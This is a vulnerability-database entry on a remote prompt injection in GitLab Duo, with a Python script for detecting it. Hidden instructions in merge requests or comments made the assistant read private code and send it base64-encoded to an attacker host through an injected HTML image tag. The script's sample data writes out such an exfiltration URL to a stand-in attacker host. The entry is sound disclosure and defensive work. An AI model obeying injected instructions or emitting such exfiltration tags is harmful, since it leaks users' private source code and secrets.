high

Remote Prompt Injection in GitLab Duo Leaks Source Code

Published Thu, May 22nd, 2025

Platforms

gitlab

Summary

A remote prompt injection vulnerability in GitLab Duo, GitLab's AI assistant, allowed an attacker who could add content to a project (for example a merge request description, commit message, issue or comment) to plant hidden instructions that Duo followed when a victim later invoked it. Because Duo operates with the victim's access to private projects, the injected instructions could make it read private source code, manipulate its code suggestions, and exfiltrate confidential information. Exfiltration relied on an HTML injection in Duo's rendered responses: the prompt made Duo emit an HTML tag whose URL pointed at an attacker-controlled host and carried the stolen data base64-encoded, and the victim's browser fetched that URL automatically. GitLab has since patched both the HTML injection and the prompt injection vectors.

Affected Services

N/A

Remediation

No customer action is required; GitLab patched both the HTML injection and the prompt injection vectors on its side. Users of Duo should still treat project content that the assistant reads (merge requests, issues, comments, source code) as untrusted input and review Duo's suggestions before acting on them.

Tracked CVEs

No tracked CVEs

References

Contributed by https://github.com/korniko98

Entry Status

Stub (AI-Generated)

Disclosure Date

Wed, Feb 12th, 2025

Exploitability Period

Until 2025/02/12

Known ITW Exploitation

-

Detection Methods

Monitor for unusual or unexpected HTML in GitLab Duo responses, in particular img, form or similar tags whose destination is a host other than the GitLab instance itself. Because the exfiltration request is issued by the victim's browser rather than by GitLab, the second signal is in browser egress or proxy logs, not GitLab server logs: watch for requests with a GitLab page as Referer going to unfamiliar hosts, especially when the path or query string carries a long base64-encoded value that decodes to readable text. Review project content (merge request descriptions, commit messages, issues, comments) for hidden instruction text, such as invisible Unicode characters or text rendered in the background colour.
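The two detection heuristics above, as an added example that is not code from GitLab or from the original researchers. It scans a rendered assistant response for HTML tags pointing at an external host, and scans egress-proxy log lines for requests from a GitLab page to an external host whose URL carries a long base64 token that decodes to readable text. The trusted host name, the five-field log format and all sample data are constructed assumptions.

```python
"""Heuristic detection for prompt-injection exfiltration via rendered HTML.
Added example; host names, log format and sample data are constructed."""
import base64
import re
from urllib.parse import urlsplit

# Assumption: the instance's own host(s); any other destination is "external".
TRUSTED_HOSTS = {"gitlab.example.com"}

# Tags a browser fetches or submits without a click; group 2 is the URL.
TAG_RE = re.compile(
    r"<(img|form|iframe|link|script)\b[^>]*?\b(?:src|action|href)\s*=\s*[\"']([^\"']+)[\"']",
    re.IGNORECASE,
)
# 40 or more base64 characters (standard or URL-safe alphabet), optional padding.
B64_RE = re.compile(r"[A-Za-z0-9+/_-]{40,}={0,2}")


def external_html_targets(response_html):
    """Return (tag, url) pairs for tags whose destination is not a trusted host."""
    hits = []
    for tag, url in TAG_RE.findall(response_html):
        host = urlsplit(url).hostname
        if host and host.lower() not in TRUSTED_HOSTS:
            hits.append((tag.lower(), url))
    return hits


def decode_if_text(token):
    """Base64-decode token if it yields printable UTF-8 text, else None.

    Asset hashes and session ids almost never decode to clean text, so this
    removes most noise from the deliberately loose B64_RE match."""
    padded = token + "=" * (-len(token) % 4)
    for altchars in (None, b"-_"):
        try:
            raw = base64.b64decode(padded, altchars=altchars, validate=True)
            text = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if text and all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    return None


def parse_log_line(line):
    """Constructed egress-proxy format: timestamp client method url referer."""
    parts = line.split()
    if len(parts) != 5:
        return None
    ts, client, method, url, referer = parts
    return {"ts": ts, "client": client, "method": method, "url": url, "referer": referer}


def flag_egress(log_lines):
    """Flag requests made from a GitLab page to an external host whose URL
    carries a base64 token that decodes to readable text."""
    findings = []
    for line in log_lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        ref_host = urlsplit(rec["referer"]).hostname
        dst_host = urlsplit(rec["url"]).hostname
        if ref_host is None or ref_host.lower() not in TRUSTED_HOSTS:
            continue  # not triggered from a GitLab page
        if dst_host is None or dst_host.lower() in TRUSTED_HOSTS:
            continue  # stays on the instance; normal asset or API traffic
        for token in B64_RE.findall(rec["url"]):
            text = decode_if_text(token)
            if text is not None:
                findings.append({"ts": rec["ts"], "client": rec["client"],
                                 "host": dst_host, "decoded": text})
                break
    return findings


# --- constructed sample data, not from a real incident ---
LEAKED_SNIPPET = "DB_PASSWORD = 'hunter2'\nAPI_KEY = 'sk-test-000'\n"
SAMPLE_B64 = base64.b64encode(LEAKED_SNIPPET.encode()).decode()

SAMPLE_RESPONSE = (
    "<p>Here is a summary of the merge request.</p>"
    '<img src="https://gitlab.example.com/uploads/diagram.png">'
    f'<img src="https://collector.attacker.example/p?d={SAMPLE_B64}" width="0" height="0">'
)

SAMPLE_LOG = [
    "2025-05-22T10:00:01Z 10.0.0.5 GET https://gitlab.example.com/assets/app-3f9c2a1b.js"
    " https://gitlab.example.com/group/proj/-/merge_requests/12",
    f"2025-05-22T10:00:02Z 10.0.0.5 GET https://collector.attacker.example/p?d={SAMPLE_B64}"
    " https://gitlab.example.com/group/proj/-/merge_requests/12",
    "2025-05-22T10:00:03Z 10.0.0.7 GET https://cdn.example.net/lib/vendor-8a7b6c5d4e3f.js"
    " https://news.example.org/",
]

if __name__ == "__main__":
    for tag, url in external_html_targets(SAMPLE_RESPONSE):
        print(f"external {tag} target in response: {url}")
    for f in flag_egress(SAMPLE_LOG):
        print(f"{f['ts']} {f['client']} -> {f['host']} decoded: {f['decoded']!r}")
```

The decode-to-text check is what keeps the base64 heuristic usable: long alphanumeric runs are common in asset URLs, but they rarely decode to printable UTF-8, whereas leaked source or configuration does.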

Piercing Index Rating

-

Discovered by

Omer Mayraz, Legit Security